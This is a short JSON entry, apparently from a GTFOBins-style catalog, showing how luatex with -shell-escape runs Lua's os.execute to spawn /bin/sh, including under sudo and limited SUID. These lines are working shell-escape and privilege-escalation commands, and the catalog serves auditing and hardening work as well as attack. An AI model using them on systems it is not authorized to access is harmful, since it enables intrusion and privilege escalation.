You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

21 lines
453 B
JSON

{
"description": "This allows to execute Lua code.",
"functions": {
"shell": [
{
"code": "luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
}
],
"sudo": [
{
"code": "sudo luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
}
],
"limited-suid": [
{
"code": "./luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
}
]
}
}